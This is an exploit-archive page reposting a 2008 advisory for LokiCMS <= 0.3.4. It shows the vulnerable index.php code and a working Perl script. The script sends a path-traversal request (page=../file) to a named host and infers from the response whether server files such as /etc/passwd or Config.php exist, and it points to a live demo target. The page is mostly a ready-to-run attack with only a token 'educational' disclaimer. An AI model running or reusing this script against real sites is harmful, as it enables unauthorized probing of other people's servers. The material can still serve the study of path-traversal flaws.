首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
来源:http://spanish-hackers.com 作者:JosS 发布时间:2008-10-20  

# LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit
# url: http://www.lokicms.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

vulnerability:
The vulnerability allows to verify the existence of the files and directories around the server.
/etc/passwd (example)

vuln file: index.php
vuln code:
------------------------------------------------
if ( isset ( $_GET ) && isset ( $_GET['page'] ) ) $pagename = stripslashes ( trim ( $_GET['page'] ) );

 

// load the page

if ($pagename == '') {

 $name = $c_default;

 $nosimple = true;

} else {

 $name = $pagename;

};

 

if ($c_simplelink == true && $nosimple != true) {

 $content = findpage($name);

 if ($content == "") {$content = $c_default;};

} else {

 $content = $name;

};

 

// stupid fix due to subdomain problems

if ($c_modrewrite != true && $pagename != '') {if (file_exists(PATH . "/pages/" . $content) == false) {$content = $c_default;};};

 

// load the menu

$menu = getmenu($content, $c_modrewrite, $c_simplelink);

 

$content = parsepage($content);
------------------------------------------------

use strict;
use LWP::UserAgent;

sub lw
{

my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
     $linux="0";
     }else{
      $linux="1";
     }
  if($linux){
system("clear");
}
else{
system("cls");
}

}

&lw;

print "#################################################################\n";
print "#  LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit  #\n";
print "#################################################################\n";

my $victim = $ARGV[0];
my $file = $ARGV[1];

 if((!$ARGV[0]) && (!$ARGV[1])) {
    print "\n[x] LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit\n";
    print "[x] written by JosS - sys-project[at]hotmail.com\n";
    print "[x] usage: perl xpl.pl [host] [file]\n";
    print "[x] example: http://localhost/loki/ /includes/Config.php\n\n";
    exit(1);
 }
 
    print "\n[+] connecting: $victim\n";
    my $cnx = LWP::UserAgent->new() or die;
    my $go=$cnx->get($victim."index.php?page=../$file");
    if ($go->content =~ m/LokiCMS/ms) {
        print "[-] The file not exist\n\n";
    } else {
        print "[!] The file exist: $file\n\n";
    }

# live demo: http://demo.opensourcecms.com/lokicms/
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Globsy <= 1.0 Remote File Rewr
·GuildFTPd 0.999.8.11/0.999.14
·SlimCMS <= 1.0.0 (redirect.php
·NoticeWare E-mail Server 5.1.2
·MS08-066 AFD.sys Local Privile
·WinFTP 2.3.0 (PASV mode) Remot
·MS Windows GDI+ Proof of Conce
·Stash 1.0.3 (SQL) User Credent
·Kusaba <= 1.0.4 Remote Code Ex
·Yerba SACphp <= 6.3 / Local Fi
·Konqueror 3.5.9 (font color) M
·>Microsoft PicturePusher Activ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved